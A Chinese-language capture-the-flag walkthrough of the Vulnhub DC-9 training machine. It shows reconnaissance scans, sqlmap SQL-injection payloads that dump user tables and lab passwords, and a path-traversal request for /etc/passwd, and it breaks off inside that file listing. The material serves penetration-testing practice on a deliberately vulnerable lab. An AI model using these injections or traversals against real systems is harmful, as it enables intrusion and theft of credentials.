免责声明
本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关。
目录
- 免责声明
- 前言
- 一、环境配置
- 二、信息收集
- 2.1 主机发现
- 2.2 端口扫描
- 2.3 指纹识别
- 2.4 目录扫描
- 2.4.1 Nikto目录扫描
- 2.4.2 dirsearch目录扫描
- 2.5 漏洞发现
- 2.5.1 页面访问
- 三、渗透测试
- 3.1 SQL注入
- 3.1.1 获得数据库名称列表
- 3.1.2 获取数据库中的表名
- 3.1.2.1 获取数据库Staff中的表名
- 3.1.2.2 获取数据库users中的表名
- 3.1.3 获取表中信息
- 3.1.3.1 获取StaffDetails(Staff数据库)表中信息
- 3.1.3.2 获取Users(Staff数据库)表中信息
- 3.1.3.1 获取UserDetails(users数据库)表中信息
- 3.2 LFI包含
- 3.2.1 登录
- 3.2.2 文件包含漏洞
- 3.2.3 敲门服务
- 3.3 SSH相关
- 3.3.1 nc开启SSH服务
- 3.3.2 端口扫描
- 3.3.3 hydra
- 3.3.3.1 生成字典
- 3.3.3.2 执行hydra爆破ssh
- 3.4 ssh连接
- 3.4.1 chandlerb
- 3.4.2 joeyt
- 3.4.3 janitor
- 3.4.4 fredf
- 3.5 linux系统提权
- 3.5.1 kali生成hash密码
- 3.5.2 将密码写入/etc/passwd
- 3.5.3 获得flag
- 3.5.3.1 切换admin用户
- 3.5.3.2 查找flag文件
- 3.5.3.3 查看flag文件
- 渗透总结
- 参考文章
前言
今日测试内容渗透dc-9靶机:
Vulnhub是一个提供各种漏洞环境的靶场平台,大部分环境是做好的虚拟机镜像文件,镜像预先设计了多种漏洞。本文将介绍dc-9靶机渗透测试,内容包括nmap扫描、目录扫描(nikto\dirsearch\dirb)、SQ注入、wfuzz爆破、LFI文件包含、SSH爆破(knockd\nmap\netcat\Hydra)、linux内核提权(openssl)并获得flag等内容。
Description
Back to the Top
DESCRIPTION
DC-9 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing.
The ultimate goal of this challenge is to get root and to read the one and only flag.
Linux skills and familiarity with the Linux command line are a must, as is some experience with basic penetration testing tools.
For beginners, Google can be of great assistance, but you can always tweet me at @DCAU7 for assistance to get you going again.
But take note: I won’t give you the answer, instead, I’ll give you an idea about how to move forward.
一、环境配置
靶场信息
官方链接 | https://www.vulnhub.com/entry/dc-9,412/ |
---|---|
发布日期 | 2019年12月29日 |
靶场大小 | 700MB |
作者 | DCAU |
系列 | DC |
难度 | ★★☆☆☆ |
渗透测试环境配置,请参考作者前面的内容,不再赘述:
vuInhub靶场实战系列-DC-2实战:https://editor.csdn.net/md/?articleId=139026849
二、信息收集
2.1 主机发现
┌──(root㉿kali)-[/home/kali]
└─# arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:b6:02:f0, IPv4: 192.168.6.66
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.6.1 00:50:56:c0:00:08 VMware, Inc.
192.168.6.2 00:50:56:f5:7b:9f VMware, Inc.
192.168.6.145 00:0c:29:c1:5e:37 VMware, Inc.
192.168.6.254 00:50:56:e9:88:8e VMware, Inc.4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.359 seconds (108.52 hosts/sec). 4 responded
获得目标主机信息:
IP地址: 192.168.6.145
MAC地址: 00:0c:29:c1:5e:37
2.2 端口扫描
┌──(root㉿kali)-[/home/kali]
└─# nmap -sC -sV -oA dc-9 192.168.6.145
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-01 06:35 EDT
Nmap scan report for 192.168.6.145
Host is up (0.00027s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp filtered ssh
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Example.com - Staff Details - Welcome
MAC Address: 00:0C:29:C1:5E:37 (VMware)Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 20.79 seconds
扫描结果显示:
22端口:ssh服务(filtered过滤)
80端口:http服务
2.3 指纹识别
┌──(root㉿kali)-[/home/kali]
└─# whatweb -v 192.168.6.145
WhatWeb report for http://192.168.6.145
Status : 200 OK
Title : Example.com - Staff Details - Welcome
IP : 192.168.6.145
Country : RESERVED, ZZSummary : Apache[2.4.38], HTML5, HTTPServer[Debian Linux][Apache/2.4.38 (Debian)]Detected Plugins:
[ Apache ]The Apache HTTP Server Project is an effort to develop and maintain an open-source HTTP server for modern operating systems including UNIX and Windows NT. The goal of this project is to provide a secure, efficient and extensible server that provides HTTP services in sync with the current HTTP standards. Version : 2.4.38 (from HTTP Server Header)Google Dorks: (3)Website : http://httpd.apache.org/[ HTML5 ]HTML version 5, detected by the doctype declaration [ HTTPServer ]HTTP server header string. This plugin also attempts to identify the operating system from the server header. OS : Debian LinuxString : Apache/2.4.38 (Debian) (from server string)HTTP Headers:HTTP/1.1 200 OKDate: Sat, 01 Jun 2024 10:39:45 GMTServer: Apache/2.4.38 (Debian)Vary: Accept-EncodingContent-Encoding: gzipContent-Length: 402Connection: closeContent-Type: text/html; charset=UTF-8
结果显示:
Apache[2.4.38], HTML5, HTTPServer[Debian Linux][Apache/2.4.38 (Debian)]
2.4 目录扫描
2.4.1 Nikto目录扫描
┌──(root㉿kali)-[/home/kali]
└─# nikto -host 192.168.6.145
- Nikto v2.5.0
---------------------------------------------------------------------------
+ Target IP: 192.168.6.145
+ Target Hostname: 192.168.6.145
+ Target Port: 80
+ Start Time: 2024-06-01 06:41:43 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ /: The anti-clickjacking X-Frame-Options header is not present. See: https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Frame-Options
+ /: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https://www.netsparker.com/web-vulnerability-scanner/vulnerabilities/missing-content-type-header/
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.38 appears to be outdated (current is at least Apache/2.4.54). Apache 2.2.34 is the EOL for the 2.x branch.
+ /: Web Server returns a valid response with junk HTTP methods which may cause false positives.
+ /config.php: PHP Config file may contain database IDs and passwords.
+ /css/: Directory indexing found.
+ /css/: This might be interesting.
+ /includes/: Directory indexing found.
+ /includes/: This might be interesting.
+ /icons/README: Apache default file found. See: https://www.vntweb.co.uk/apache-restricting-access-to-iconsreadme/
+ 8102 requests: 0 error(s) and 10 item(s) reported on remote host
+ End Time: 2024-06-01 06:42:21 (GMT-4) (38 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
2.4.2 dirsearch目录扫描
┌──(root㉿kali)-[/home/kali]
└─# dirsearch -u 192.168.6.145 -e * -x 404
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.htmlfrom pkg_resources import DistributionNotFound, VersionConflict_|. _ _ _ _ _ _|_ v0.4.3(_||| _) (/_(_|| (_| )Extensions: 39772.zip | HTTP method: GET | Threads: 25 | Wordlist size: 9481Output File: /home/kali/reports/_192.168.6.145/_24-06-01_06-43-35.txtTarget: http://192.168.6.145/[06:43:35] Starting:
[06:43:40] 403 - 278B - /.ht_wsr.txt
[06:43:40] 403 - 278B - /.htaccess.sample
[06:43:40] 403 - 278B - /.htaccess.bak1
[06:43:40] 403 - 278B - /.htaccess.save
[06:43:40] 403 - 278B - /.htaccess_orig
[06:43:40] 403 - 278B - /.htaccess_sc
[06:43:40] 403 - 278B - /.htaccess.orig
[06:43:40] 403 - 278B - /.htaccessBAK
[06:43:40] 403 - 278B - /.html
[06:43:40] 403 - 278B - /.htm
[06:43:40] 403 - 278B - /.htaccessOLD2
[06:43:40] 403 - 278B - /.htpasswd_test
[06:43:40] 403 - 278B - /.htaccessOLD
[06:43:40] 403 - 278B - /.htaccess_extra
[06:43:40] 403 - 278B - /.htpasswds
[06:43:40] 403 - 278B - /.httr-oauth
[06:43:42] 403 - 278B - /.php
[06:44:07] 200 - 0B - /config.php
[06:44:10] 301 - 312B - /css -> http://192.168.6.145/css/
[06:44:23] 200 - 407B - /includes/
[06:44:23] 301 - 317B - /includes -> http://192.168.6.145/includes/
[06:44:32] 200 - 494B - /manage.php
[06:44:54] 403 - 278B - /server-status/
[06:44:53] 403 - 278B - /server-status Task Completed
测试结束,获得一些关键信息:
http://192.168.6.145/includes/
http://192.168.6.145/manage.php
2.5 漏洞发现
2.5.1 页面访问
管理页面: http://192.168.6.145/manage.php
网站根目录:192.168.6.145
Home页:http://192.168.6.145/index.php
display页:http://192.168.6.145/display.php
search页:http://192.168.6.145/search.php
分析:
在search页输入’or 1=1 --+,点击submit
返回信息如下:
返回17条用户信息,所有此页面(http://192.168.6.145/search.php)存在SQL注入漏洞
三、渗透测试
3.1 SQL注入
3.1.1 获得数据库名称列表
┌──(root㉿kali)-[/home/kali]
└─# sqlmap -u "http://192.168.6.145/results.php" --data "search=1" --dbs_____H_____ ___[)]_____ ___ ___ {1.8.3#stable}
|_ -| . [.] | .'| . |
|___|_ [)]_|_|_|__,| _||_|V... |_| https://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting @ 07:15:05 /2024-06-01/[07:15:06] [INFO] testing connection to the target URL
[07:15:06] [INFO] checking if the target is protected by some kind of WAF/IPS
[07:15:06] [INFO] testing if the target URL content is stable
[07:15:06] [INFO] target URL content is stable
[07:15:06] [INFO] testing if POST parameter 'search' is dynamic
[07:15:07] [WARNING] POST parameter 'search' does not appear to be dynamic
[07:15:07] [WARNING] heuristic (basic) test shows that POST parameter 'search' might not be injectable
[07:15:07] [INFO] testing for SQL injection on POST parameter 'search'
[07:15:07] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[07:15:07] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
[07:15:07] [INFO] testing 'MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)'
[07:15:07] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
[07:15:07] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
[07:15:07] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
[07:15:07] [INFO] testing 'Generic inline queries'
[07:15:07] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
[07:15:07] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[07:15:07] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
[07:15:07] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
[07:15:27] [INFO] POST parameter 'search' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[07:18:50] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[07:18:50] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[07:18:50] [INFO] target URL appears to be UNION injectable with 6 columns
[07:18:50] [INFO] POST parameter 'search' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
POST parameter 'search' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection point(s) with a total of 71 HTTP(s) requests:
---
Parameter: search (POST)Type: time-based blindTitle: MySQL >= 5.0.12 AND time-based blind (query SLEEP)Payload: search=1' AND (SELECT 4610 FROM (SELECT(SLEEP(5)))KBXw) AND 'fzWV'='fzWVType: UNION queryTitle: Generic UNION query (NULL) - 6 columnsPayload: search=1' UNION ALL SELECT NULL,NULL,CONCAT(0x717a717171,0x574941476d687344774a4b496777675842784b77727372646e5354684d737255474f487a79525147,0x71716a7a71),NULL,NULL,NULL-- -
---
[07:18:53] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 10 (buster)
web application technology: Apache 2.4.38
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[07:18:53] [INFO] fetching database names
available databases [3]:
[*] information_schema
[*] Staff
[*] users[07:18:53] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.6.145'[*] ending @ 07:18:53 /2024-06-01/
测试结束,获得数据库列表:
fetching database namesavailable databases [3]:
[ * ] information_schema
[ * ] Staff
[ * ] users
3.1.2 获取数据库中的表名
3.1.2.1 获取数据库Staff中的表名
┌──(root㉿kali)-[/home/kali]
└─# sqlmap -u "http://192.168.6.145/results.php" --data "search=1" -D Staff --tables _____H_____ ___[.]_____ ___ ___ {1.8.3#stable}
|_ -| . ["] | .'| . |
|___|_ ["]_|_|_|__,| _||_|V... |_| https://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting @ 07:31:48 /2024-06-01/[07:31:48] [INFO] resuming back-end DBMS 'mysql'
[07:31:48] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: search (POST)Type: time-based blindTitle: MySQL >= 5.0.12 AND time-based blind (query SLEEP)Payload: search=1' AND (SELECT 4610 FROM (SELECT(SLEEP(5)))KBXw) AND 'fzWV'='fzWVType: UNION queryTitle: Generic UNION query (NULL) - 6 columnsPayload: search=1' UNION ALL SELECT NULL,NULL,CONCAT(0x717a717171,0x574941476d687344774a4b496777675842784b77727372646e5354684d737255474f487a79525147,0x71716a7a71),NULL,NULL,NULL-- -
---
[07:31:48] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 10 (buster)
web application technology: Apache 2.4.38
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[07:31:48] [INFO] fetching tables for database: 'Staff'
Database: Staff
[2 tables]
+--------------+
| StaffDetails |
| Users |
+--------------+[07:31:48] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.6.145'[*] ending @ 07:31:48 /2024-06-01/
爆破Staff数据库获得2个表:
StaffDetails
Users
3.1.2.2 获取数据库users中的表名
┌──(root㉿kali)-[/home/kali]
└─# sqlmap -u "http://192.168.6.145/results.php" --data "search=1" -D users --tables_____H_____ ___["]_____ ___ ___ {1.8.3#stable}
|_ -| . [,] | .'| . |
|___|_ [.]_|_|_|__,| _||_|V... |_| https://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting @ 07:34:48 /2024-06-01/[07:34:48] [INFO] resuming back-end DBMS 'mysql'
[07:34:48] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: search (POST)Type: time-based blindTitle: MySQL >= 5.0.12 AND time-based blind (query SLEEP)Payload: search=1' AND (SELECT 4610 FROM (SELECT(SLEEP(5)))KBXw) AND 'fzWV'='fzWVType: UNION queryTitle: Generic UNION query (NULL) - 6 columnsPayload: search=1' UNION ALL SELECT NULL,NULL,CONCAT(0x717a717171,0x574941476d687344774a4b496777675842784b77727372646e5354684d737255474f487a79525147,0x71716a7a71),NULL,NULL,NULL-- -
---
[07:34:48] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 10 (buster)
web application technology: Apache 2.4.38
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[07:34:48] [INFO] fetching tables for database: 'users'
Database: users
[1 table]
+-------------+
| UserDetails |
+-------------+[07:34:48] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.6.145'[*] ending @ 07:34:48 /2024-06-01/
爆破users数据获得1个表:
UserDetails
3.1.3 获取表中信息
3.1.3.1 获取StaffDetails(Staff数据库)表中信息
┌──(root㉿kali)-[/home/kali]
└─# sqlmap -u "http://192.168.6.145/results.php" --data "search=1" -D Staff -T StaffDetails --dump_____H_____ ___[.]_____ ___ ___ {1.8.3#stable}
|_ -| . [.] | .'| . |
|___|_ [(]_|_|_|__,| _||_|V... |_| https://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting @ 07:38:15 /2024-06-01/[07:38:16] [INFO] resuming back-end DBMS 'mysql'
[07:38:16] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: search (POST)Type: time-based blindTitle: MySQL >= 5.0.12 AND time-based blind (query SLEEP)Payload: search=1' AND (SELECT 4610 FROM (SELECT(SLEEP(5)))KBXw) AND 'fzWV'='fzWVType: UNION queryTitle: Generic UNION query (NULL) - 6 columnsPayload: search=1' UNION ALL SELECT NULL,NULL,CONCAT(0x717a717171,0x574941476d687344774a4b496777675842784b77727372646e5354684d737255474f487a79525147,0x71716a7a71),NULL,NULL,NULL-- -
---
[07:38:16] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 10 (buster)
web application technology: Apache 2.4.38
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[07:38:16] [INFO] fetching columns for table 'StaffDetails' in database 'Staff'
[07:38:16] [INFO] fetching entries for table 'StaffDetails' in database 'Staff'
Database: Staff
Table: StaffDetails
[17 entries]
+----+-----------------------+----------------+------------+---------------------+-----------+-------------------------------+
| id | email | phone | lastname | reg_date | firstname | position |
+----+-----------------------+----------------+------------+---------------------+-----------+-------------------------------+
| 1 | marym@example.com | 46478415155456 | Moe | 2019-05-01 17:32:00 | Mary | CEO |
| 2 | julied@example.com | 46457131654 | Dooley | 2019-05-01 17:32:00 | Julie | Human Resources |
| 3 | fredf@example.com | 46415323 | Flintstone | 2019-05-01 17:32:00 | Fred | Systems Administrator |
| 4 | barneyr@example.com | 324643564 | Rubble | 2019-05-01 17:32:00 | Barney | Help Desk |
| 5 | tomc@example.com | 802438797 | Cat | 2019-05-01 17:32:00 | Tom | Driver |
| 6 | jerrym@example.com | 24342654756 | Mouse | 2019-05-01 17:32:00 | Jerry | Stores |
| 7 | wilmaf@example.com | 243457487 | Flintstone | 2019-05-01 17:32:00 | Wilma | Accounts |
| 8 | bettyr@example.com | 90239724378 | Rubble | 2019-05-01 17:32:00 | Betty | Junior Accounts |
| 9 | chandlerb@example.com | 189024789 | Bing | 2019-05-01 17:32:00 | Chandler | President - Sales |
| 10 | joeyt@example.com | 232131654 | Tribbiani | 2019-05-01 17:32:00 | Joey | Janitor |
| 11 | rachelg@example.com | 823897243978 | Green | 2019-05-01 17:32:00 | Rachel | Personal Assistant |
| 12 | rossg@example.com | 6549638203 | Geller | 2019-05-01 17:32:00 | Ross | Instructor |
| 13 | monicag@example.com | 8092432798 | Geller | 2019-05-01 17:32:00 | Monica | Marketing |
| 14 | phoebeb@example.com | 43289079824 | Buffay | 2019-05-01 17:32:02 | Phoebe | Assistant Janitor |
| 15 | scoots@example.com | 454786464 | McScoots | 2019-05-01 20:16:33 | Scooter | Resident Cat |
| 16 | janitor@example.com | 65464646479741 | Trump | 2019-12-23 03:11:39 | Donald | Replacement Janitor |
| 17 | janitor2@example.com | 47836546413 | Morrison | 2019-12-24 03:41:04 | Scott | Assistant Replacement Janitor |
+----+-----------------------+----------------+------------+---------------------+-----------+-------------------------------+[07:38:17] [INFO] table 'Staff.StaffDetails' dumped to CSV file '/root/.local/share/sqlmap/output/192.168.6.145/dump/Staff/StaffDetails.csv'
[07:38:17] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.6.145'[*] ending @ 07:38:17 /2024-06-01/
爆破信息如上图bash代码块所示,展示了所有数据库Staff中的StaffDetails表对应的所有用户信息(email,phone,lastname,firstname,position)。
3.1.3.2 获取Users(Staff数据库)表中信息
┌──(root㉿kali)-[/home/kali]
└─# sqlmap -u "http://192.168.6.145/results.php" --data "search=1" -D Staff -T Users --dump _____H_____ ___[)]_____ ___ ___ {1.8.3#stable}
|_ -| . [,] | .'| . |
|___|_ [,]_|_|_|__,| _||_|V... |_| https://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting @ 07:45:38 /2024-06-01/[07:45:38] [INFO] resuming back-end DBMS 'mysql'
[07:45:38] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: search (POST)Type: time-based blindTitle: MySQL >= 5.0.12 AND time-based blind (query SLEEP)Payload: search=1' AND (SELECT 4610 FROM (SELECT(SLEEP(5)))KBXw) AND 'fzWV'='fzWVType: UNION queryTitle: Generic UNION query (NULL) - 6 columnsPayload: search=1' UNION ALL SELECT NULL,NULL,CONCAT(0x717a717171,0x574941476d687344774a4b496777675842784b77727372646e5354684d737255474f487a79525147,0x71716a7a71),NULL,NULL,NULL-- -
---
[07:45:38] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 10 (buster)
web application technology: Apache 2.4.38
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[07:45:38] [INFO] fetching columns for table 'Users' in database 'Staff'
[07:45:38] [INFO] fetching entries for table 'Users' in database 'Staff'
[07:45:39] [INFO] recognized possible password hashes in column 'Password'
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] y
[07:45:42] [INFO] writing hashes to a temporary file '/tmp/sqlmapamxv6dki591911/sqlmaphashes-btocsf9y.txt'
do you want to crack them via a dictionary-based attack? [Y/n/q] y
[07:45:44] [INFO] using hash method 'md5_generic_passwd'
what dictionary do you want to use?
[1] default dictionary file '/usr/share/sqlmap/data/txt/wordlist.tx_' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> [07:45:46] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] [07:45:47] [INFO] starting dictionary-based cracking (md5_generic_passwd)
[07:45:47] [INFO] starting 8 processes
[07:46:13] [WARNING] no clear password(s) found
Database: Staff
Table: Users
[1 entry]
+--------+----------------------------------+----------+
| UserID | Password | Username |
+--------+----------------------------------+----------+
| 1 | 856f5de590ef37314e7c3bdf6f8a66dc | admin |
+--------+----------------------------------+----------+[07:46:13] [INFO] table 'Staff.Users' dumped to CSV file '/root/.local/share/sqlmap/output/192.168.6.145/dump/Staff/Users.csv'
[07:46:13] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.6.145'[*] ending @ 07:46:13 /2024-06-01/
爆破信息如上图bash代码块所示,展示了所有数据库Staff中的Users表对应的用户信息(只有一条数据):
用户名(Username ) | 密码(Password) |
---|---|
admin | 856f5de590ef37314e7c3bdf6f8a66dc(transorbital1) |
Password的长度为32,应该是MD5加密。
使用在线解密网站,进行解密,得到Password的明文密码:
Password:transorbital1
3.1.3.1 获取UserDetails(users数据库)表中信息
┌──(root㉿kali)-[/home/kali]
└─# sqlmap -u "http://192.168.6.145/results.php" --data "search=1" -D users -T UserDetails --dump_____H_____ ___[(]_____ ___ ___ {1.8.3#stable}
|_ -| . [)] | .'| . |
|___|_ [']_|_|_|__,| _||_|V... |_| https://sqlmap.org[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program[*] starting @ 08:00:17 /2024-06-01/[08:00:18] [INFO] resuming back-end DBMS 'mysql'
[08:00:18] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: search (POST)Type: time-based blindTitle: MySQL >= 5.0.12 AND time-based blind (query SLEEP)Payload: search=1' AND (SELECT 4610 FROM (SELECT(SLEEP(5)))KBXw) AND 'fzWV'='fzWVType: UNION queryTitle: Generic UNION query (NULL) - 6 columnsPayload: search=1' UNION ALL SELECT NULL,NULL,CONCAT(0x717a717171,0x574941476d687344774a4b496777675842784b77727372646e5354684d737255474f487a79525147,0x71716a7a71),NULL,NULL,NULL-- -
---
[08:00:18] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian 10 (buster)
web application technology: Apache 2.4.38
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
[08:00:18] [INFO] fetching columns for table 'UserDetails' in database 'users'
[08:00:18] [INFO] fetching entries for table 'UserDetails' in database 'users'
Database: users
Table: UserDetails
[17 entries]
+----+------------+---------------+---------------------+-----------+-----------+
| id | lastname | password | reg_date | username | firstname |
+----+------------+---------------+---------------------+-----------+-----------+
| 1 | Moe | 3kfs86sfd | 2019-12-29 16:58:26 | marym | Mary |
| 2 | Dooley | 468sfdfsd2 | 2019-12-29 16:58:26 | julied | Julie |
| 3 | Flintstone | 4sfd87sfd1 | 2019-12-29 16:58:26 | fredf | Fred |
| 4 | Rubble | RocksOff | 2019-12-29 16:58:26 | barneyr | Barney |
| 5 | Cat | TC&TheBoyz | 2019-12-29 16:58:26 | tomc | Tom |
| 6 | Mouse | B8m#48sd | 2019-12-29 16:58:26 | jerrym | Jerry |
| 7 | Flintstone | Pebbles | 2019-12-29 16:58:26 | wilmaf | Wilma |
| 8 | Rubble | BamBam01 | 2019-12-29 16:58:26 | bettyr | Betty |
| 9 | Bing | UrAG0D! | 2019-12-29 16:58:26 | chandlerb | Chandler |
| 10 | Tribbiani | Passw0rd | 2019-12-29 16:58:26 | joeyt | Joey |
| 11 | Green | yN72#dsd | 2019-12-29 16:58:26 | rachelg | Rachel |
| 12 | Geller | ILoveRachel | 2019-12-29 16:58:26 | rossg | Ross |
| 13 | Geller | 3248dsds7s | 2019-12-29 16:58:26 | monicag | Monica |
| 14 | Buffay | smellycats | 2019-12-29 16:58:26 | phoebeb | Phoebe |
| 15 | McScoots | YR3BVxxxw87 | 2019-12-29 16:58:26 | scoots | Scooter |
| 16 | Trump | Ilovepeepee | 2019-12-29 16:58:26 | janitor | Donald |
| 17 | Morrison | Hawaii-Five-0 | 2019-12-29 16:58:28 | janitor2 | Scott |
+----+------------+---------------+---------------------+-----------+-----------+[08:00:18] [INFO] table 'users.UserDetails' dumped to CSV file '/root/.local/share/sqlmap/output/192.168.6.145/dump/users/UserDetails.csv'
[08:00:18] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.6.145'[*] ending @ 08:00:18 /2024-06-01/
爆破得到users数据库中UserDetails表中所有用户信息,包含用户名(username )和密码(password)
3.2 LFI包含
3.2.1 登录
登录页:http://192.168.6.145/manage.php
用户名:admin
密 码:transorbital1
3.2.2 文件包含漏洞
测试连接:http://192.168.6.145/addrecord.php?file=…/…/…/…/etc/passwd
返回数据:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin _apt:x:100:65534::/nonexistent:/usr/sbin/nologin systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin messagebus:x:104:110::/nonexistent:/usr/sbin/nologin sshd:x:105:65534::/run/sshd:/usr/sbin/nologin systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin mysql:x:106:113:MySQL Server,,,:/nonexistent:/bin/false marym:x:1001:1001:Mary Moe:/home/marym:/bin/bash julied:x:1002:1002:Julie Dooley:/home/julied:/bin/bash fredf:x:1003:1003:Fred Flintstone:/home/fredf:/bin/bash barneyr:x:1004:1004:Barney Rubble:/home/barneyr:/bin/bash tomc:x:1005:1005:Tom Cat:/home/tomc:/bin/bash jerrym:x:1006:1006:Jerry Mouse:/home/jerrym:/bin/bash wilmaf:x:1007:1007:Wilma Flintstone:/home/wilmaf:/bin/bash bettyr:x:1008:1008:Betty Rubble:/home/bettyr:/bin/bash chandlerb:x:1009:1009:Chandler Bing:/home/chandlerb:/bin/bash joeyt:x:1010:1010:Joey Tribbiani:/home/joeyt:/bin/bash rachelg:x:1011:1011:Rachel Green:/home/rachelg:/bin/bash rossg:x:1012:1012:Ross Geller:/home/rossg:/bin/bash monicag:x:1013:1013:Monica Geller:/home/monicag:/bin/bash phoebeb:x:1014:1014:Phoebe Buffay:/home/phoebeb:/bin/bash scoots:x:1015:1015:Scooter McScoots:/home/scoots:/bin/bash janitor:x:1016:1016:Donald Trump:/home/janitor:/bin/bash janitor2:x:1017:1017:Scott 